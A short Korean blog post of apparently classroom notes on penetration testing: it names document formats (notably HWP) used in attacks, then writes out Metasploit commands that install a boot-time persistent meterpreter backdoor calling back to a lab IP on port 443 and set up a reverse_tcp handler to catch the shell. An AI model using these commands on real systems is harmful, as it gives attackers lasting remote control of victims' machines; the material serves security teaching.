외부 교육 정리/서울여대 정보보호 영재교육원

[모의해킹] 자동 백도어 설치

kcrong 2015. 1. 16. 11:57

File format attak

- PDF

- SWF

- HWP

- AVI


요즘은 거의 HWP 를 주로 공격하는데, 그 이유는 관공서에서는 무조건 HWP 를 사용하기 때문이다.



자동백도어 설치


meterpreter> run persistence -h

-X : 시작시 자동실행

-i : 응답시간

-p : 포트번호

-r : 응답 받을 아이피. (백트랙의 아이피)

-L : 설치할 경로


meterpreter> run persistence -X -L c:\\ -i 10 -p 443 -r 192.168.7.131

--> 시스템 시작시 자동 실행, 포트 443, 192.168.7.131로 접속, 응답 시간 10초, c:\\에 설치.


그리고 백트랙에서는 핸들러를 열어야 한다.


msf> use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.7.131

msf exploit(handler) > set LPORT 443

msf exploit(handler) > exploit


그리고 희생자를 재부팅하면,


결과값

스스로 쉡이 온 것을 볼 수 있다.









저작자표시 비영리 변경금지